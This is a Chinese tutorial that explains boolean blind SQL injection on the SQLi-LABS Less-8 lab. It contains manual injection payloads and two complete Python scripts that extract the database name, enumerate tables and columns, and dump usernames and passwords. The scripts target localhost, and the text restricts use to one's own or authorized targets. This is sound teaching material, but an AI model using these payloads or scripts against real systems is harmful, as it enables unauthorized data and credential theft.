如何用python开发自动化SQL注入脚本
本文以 SQLi-LABS 的 Less-8(布尔盲注)为例:先用 ?id=1' and length(database())=N --+ 猜出数据库名长度,再用 ?id=1' and substr(database(),i,1)='字母'--+ 逐位猜出数据库名,最后用 Python 脚本把表的数量、表名、字段名以及 users 表中用户名和密码的猜解过程自动化。
我们拿SQLi-LABS的less8来举个例子吧,初始化这样子的
那么判断数据库名,在网页localhost/Less8后输入
?id=1' and length(database())=1 --+ 输入后显示
此时页面不再显示 "You are in..."(条件为假),那么把 N 从 1 开始依次增大继续判断,例如输入 ?id=1' and length(database())=8 --+
当 length(database())=8 时页面恢复正常显示(条件为真),说明数据库名长度为 8。
得到数据库名长度后,使用 ?id=1' and substr(database(),1,1)='字母'--+ 逐位判断数据库名。注意 MySQL 默认排序规则对字符串比较不区分大小写,='s' 同样会匹配 'S';需要精确区分大小写时可改用 ascii(substr(database(),1,1))=115 这种数值比较。这里字母输入 s 时页面正常显示,即输入
?id=1' and substr(database(),1,1)='s'--+
这样逐位尝试就能试出数据库名,但手工操作很慢,用 Python 写一个脚本自动发送这些请求会方便得多。注意:这类脚本只能用于自己搭建的靶场(如本地的 SQLi-LABS)或已获得授权的测试目标。那么具体怎么做呢?
下载python,官网www.python.org
点击Downloads,选择一个版本下载
下载后打开命令提示符输入python,可知安装成功了
直接在 python.exe 的交互窗口里敲代码,出错时不容易看出问题出在哪里,因此建议安装 PyCharm 这样的 IDE,官网的下载页面为
www.jetbrains.com/pycharm/download
运行脚本时可能会报错,比如提示没有安装 requests 模块。近年的 Python 安装包已经自带 pip,一般不需要再去 pypi.org/project/pip 的 Download files 下载 tar.gz 包手动安装;直接在命令提示符输入 python -m pip install requests 即可(pip 已在 PATH 中时也可以写 pip install requests)。
想看看装的怎么样的可在命令提示符输入 pip list
然后我们在pycharm把这段代码输入
import requests
import string
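url = "http://localhost/Less-8/"

# Largest database-name length probed before giving up.  The original listing
# also stopped at 30, but then went on guessing 30 characters of a name whose
# length it had not found; a miss now aborts cleanly.
MAX_NAME_LEN = 30

# Candidates tried for every position of the name.  The original tried only
# a-z, so a digit or '_' in the name was silently skipped; such a position is
# now reported as '?' so a truncated result is visible.
NAME_CHARS = string.ascii_lowercase + string.digits + "_"


def page_length_oracle(base_url, timeout=10):
    """Build a boolean oracle from the response length of *base_url*.

    Less-8 returns the same page for a true condition as for the plain
    ``?id=1`` request and a different one for a false condition, so a
    condition counts as true when the response length equals that baseline.
    A single ``requests.Session`` is reused for every probe and each request
    carries a timeout so a stalled target cannot hang the script forever.

    Returns ``is_true(condition)``, which sends ``?id=1'+and+<condition>--+``
    (``+`` is decoded to a space by the server) and returns True when the
    condition holds.
    """
    session = requests.Session()
    baseline = len(session.get(base_url + "?id=1", timeout=timeout).text)
    print("The len of HTML:" + str(baseline))

    def is_true(condition):
        probe = base_url + "?id=1'+and+" + condition + "--+"
        print(probe)
        return len(session.get(probe, timeout=timeout).text) == baseline

    return is_true


def find_length(is_true, expr, max_len=MAX_NAME_LEN):
    """Return ``length(expr)`` by probing 0..max_len; None when nothing matches."""
    for n in range(max_len + 1):
        if is_true("length(%s)=%d" % (expr, n)):
            return n
    return None


def extract_string(is_true, expr, length, charset=NAME_CHARS):
    """Recover *length* characters of SQL expression *expr*, one position at a time.

    Each position is tested with ``ascii(substr(expr,pos,1))=<code>`` rather
    than ``substr(...)='c'``: the string form is case-insensitive under
    MySQL's default collation and would need escaping for ``'``/``\\``, while
    the numeric form is exact and quote-free.  A position matched by nothing
    in *charset* is emitted as '?' instead of being dropped.
    """
    recovered = []
    for pos in range(1, length + 1):
        for ch in charset:
            if is_true("ascii(substr(%s,%d,1))=%d" % (expr, pos, ord(ch))):
                recovered.append(ch)
                break
        else:
            recovered.append("?")
        print("".join(recovered))
    return "".join(recovered)


def main():
    """Recover the current database name through the page-length oracle."""
    is_true = page_length_oracle(url)
    name_len = find_length(is_true, "database()")
    if name_len is None:
        print("Error!")
        return
    print("The len of dbName:" + str(name_len))
    print(extract_string(is_true, "database()", name_len))


if __name__ == "__main__":
    main()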
运行脚本(Run 'main')后即可得到数据库名为 security。
如果还想继续猜出表名、字段名以及表中的数据,可以在 PyCharm 中运行下面这段代码:
import requests
import string
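url = 'http://localhost/Less-8/'
# Schema to enumerate.  The original left db_name empty (its "...数据库共有..."
# message printed no name) while hard-coding 'security' in every payload; one
# variable now drives both.
db_name = 'security'
# Substring Less-8 prints when the injected condition is true.  The original
# checked two different spellings of it; the shorter one is used everywhere.
TRUE_MARKER = 'You are in'
# Upper bound for the name/value length probes (the original stopped at 30).
LEN_LIMIT = 30
# Upper bound for the table/column/row count probes.  The original probed these
# without any bound and so looped forever when the marker never appeared
# (target down, wrong level, different marker text).
COUNT_LIMIT = 1000
# Candidate characters for identifiers (table/column names) and for row data.
IDENT_CHARS = string.ascii_lowercase + string.digits + '_-'
DATA_CHARS = string.ascii_letters + string.digits + '_-@!'


def make_oracle(base_url, marker=TRUE_MARKER, timeout=10):
    """Return ``is_true(condition)`` for the marker-based boolean oracle of *base_url*.

    Each probe sends ``?id=1'and <condition>--+`` (requests percent-encodes the
    raw spaces; the trailing ``+`` decodes to the space MySQL needs after
    ``--``) and reports True when *marker* occurs in the response body.  One
    session is reused and every request has a timeout so a dead target fails
    instead of hanging.
    """
    session = requests.Session()

    def is_true(condition):
        res = session.get(base_url + "?id=1'and " + condition + "--+",
                          timeout=timeout)
        return marker in res.text

    return is_true


def guess_number(is_true, expr, limit=COUNT_LIMIT):
    """Return the integer value of SQL expression *expr* by probing ``(expr)=n``.

    Tries n = 0..limit in order; returns None when no value matches (the
    original loops spun forever in that case).
    """
    for n in range(limit + 1):
        if is_true("(%s)=%d" % (expr, n)):
            return n
    return None


def guess_string(is_true, expr, length, charset):
    """Recover *length* characters of SQL expression *expr* position by position.

    Compares ``ascii(substr((expr),pos,1))=<code>`` instead of
    ``substr(...)='c'``: under MySQL's default case-insensitive collation the
    string form made 'a' match 'A', so the original's qwerty...QWERTY order
    always reported lowercase letters, and it would also have needed escaping
    for a quote in the data.  A position matched by nothing in *charset* is
    emitted as '?' rather than silently dropped.
    """
    chars = []
    for pos in range(1, length + 1):
        for ch in charset:
            if is_true("ascii(substr((%s),%d,1))=%d" % (expr, pos, ord(ch))):
                chars.append(ch)
                break
        else:
            chars.append('?')
    return ''.join(chars)


def guess_value(is_true, expr, charset, max_len=LEN_LIMIT):
    """Recover the string value of *expr*: its length first, then each character.

    Returns None when the length cannot be found within *max_len*.
    """
    length = guess_number(is_true, "length((%s))" % expr, max_len)
    if length is None:
        return None
    return guess_string(is_true, expr, length, charset)


def dump_table_names(is_true, schema):
    """Print and return the table names of *schema* in information_schema order."""
    print("[+]正在猜解表的数量......")
    count = guess_number(
        is_true,
        "select count(table_name) from information_schema.tables "
        "where table_schema='%s'" % schema)
    if count is None:
        print('error!')
        return []
    print("%s数据库共有" % schema + str(count) + "张表")
    print("[+]开始猜解表名......")
    names = []
    for idx in range(count):
        name = guess_value(
            is_true,
            "select table_name from information_schema.tables "
            "where table_schema='%s' limit %d,1" % (schema, idx),
            IDENT_CHARS)
        if name is None:
            print('error!')
            break
        print("[-]第%d张表名为: %s" % (idx + 1, name))
        names.append(name)
    return names


def dump_column_names(is_true, schema, table):
    """Print and return the column names of *schema*.*table*.

    The original filtered information_schema.columns on table_name only, so a
    same-named table in any other schema would have been counted and listed
    too; the schema is now part of the WHERE clause.
    """
    count = guess_number(
        is_true,
        "select count(column_name) from information_schema.columns "
        "where table_schema='%s' and table_name='%s'" % (schema, table))
    if count is None:
        print("error!!")
        return []
    print("%s表下有%d个字段" % (table, count))
    columns = []
    for idx in range(count):
        column = guess_value(
            is_true,
            "select column_name from information_schema.columns "
            "where table_schema='%s' and table_name='%s' limit %d,1"
            % (schema, table, idx),
            IDENT_CHARS)
        if column is None:
            print("error!!")
            break
        print(column)
        columns.append(column)
    return columns


def dump_column(is_true, schema, table, column, charset=DATA_CHARS):
    """Print and return every value of *column* in *schema*.*table*.

    Rows are addressed with ``limit n,1`` exactly as the original did, so the
    order is whatever the server returns for that query.
    """
    count = guess_number(is_true,
                         "select count(%s) from %s.%s" % (column, schema, table))
    if count is None:
        print("error!!")
        return []
    values = []
    for idx in range(count):
        value = guess_value(
            is_true,
            "select %s from %s.%s limit %d,1" % (column, schema, table, idx),
            charset)
        if value is None:
            print("error!!")
            break
        print(value)
        values.append(value)
    return values


def main():
    """Enumerate tables and columns of *db_name*, then dump users.username/password."""
    is_true = make_oracle(url)
    for table in dump_table_names(is_true, db_name):
        dump_column_names(is_true, db_name, table)
    print("[+]开始猜解users表下的username......")
    dump_column(is_true, db_name, 'users', 'username')
    print("[+]开始猜解users表下的password......")
    dump_column(is_true, db_name, 'users', 'password')


if __name__ == "__main__":
    main()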
运行后即可得到表的数量、表名、字段名,以及 users 表中的用户名和密码。注意脚本是靠响应中是否包含 "You are in" 来判断条件真假的,换一个关卡或靶场时要先确认这个特征字符串,否则猜解会全部失败。